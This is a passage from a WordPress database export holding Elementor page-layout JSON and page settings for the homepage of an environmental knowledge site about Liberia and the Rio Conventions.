later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19455,2850,'_elementor_version','2.7.5'),(19456,2850,'_elementor_template_type','wp-page'),(19457,2850,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19459,2851,'_wp_page_template','default'),(19460,2851,'_elementor_edit_mode','builder'),(19461,2851,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All 